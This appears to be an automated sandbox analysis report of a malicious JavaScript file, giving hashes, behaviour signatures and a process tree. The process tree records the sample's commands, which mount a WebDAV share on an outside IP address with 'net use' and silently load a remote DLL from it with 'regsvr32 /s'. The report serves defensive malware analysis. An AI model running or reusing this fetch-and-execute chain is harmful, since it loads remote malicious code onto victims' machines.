Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
10-07-2024 01:31
Static task
static1
Behavioral task
behavioral1
Sample
513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f.js
Resource
win10v2004-20240709-en
General
-
Target
513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f.js
-
Size
5KB
-
MD5
17e532cf832f426f7873080a8fde7b80
-
SHA1
57adfe6064c9adb6812514a70e7bb7a64410f658
-
SHA256
513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f
-
SHA512
d5bbf8ac0f72ec4c57914dd53df3a9ab0f1855b99ec238a5fffb93a8f374983e5a567fa9ee9b14a99e5bc9fbc513560d3e9b2a5b7ec406ed890a5417e38610e5
-
SSDEEP
96:5pPiPwp0al1+6NBJphDJph8cIy6MIGfYogk0PxbNG2PZZBZk1Bk:5pTl3bJpxJpdp6MRA77k0
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2852 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2692 wrote to memory of 2892 2692 wscript.exe 31 PID 2692 wrote to memory of 2892 2692 wscript.exe 31 PID 2692 wrote to memory of 2892 2692 wscript.exe 31 PID 2892 wrote to memory of 2792 2892 cmd.exe 33 PID 2892 wrote to memory of 2792 2892 cmd.exe 33 PID 2892 wrote to memory of 2792 2892 cmd.exe 33 PID 2892 wrote to memory of 2852 2892 cmd.exe 34 PID 2892 wrote to memory of 2852 2892 cmd.exe 34 PID 2892 wrote to memory of 2852 2892 cmd.exe 34 PID 2892 wrote to memory of 2852 2892 cmd.exe 34 PID 2892 wrote to memory of 2852 2892 cmd.exe 34
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f.js1⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f.js" "C:\Users\Admin\\mxwavp.bat" && "C:\Users\Admin\\mxwavp.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2792
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\424.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2852
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD517e532cf832f426f7873080a8fde7b80
SHA157adfe6064c9adb6812514a70e7bb7a64410f658
SHA256513ead1df5b950cb6063cc8868ba5ac22013ae46fceb348f28b63bd9f78d239f
SHA512d5bbf8ac0f72ec4c57914dd53df3a9ab0f1855b99ec238a5fffb93a8f374983e5a567fa9ee9b14a99e5bc9fbc513560d3e9b2a5b7ec406ed890a5417e38610e5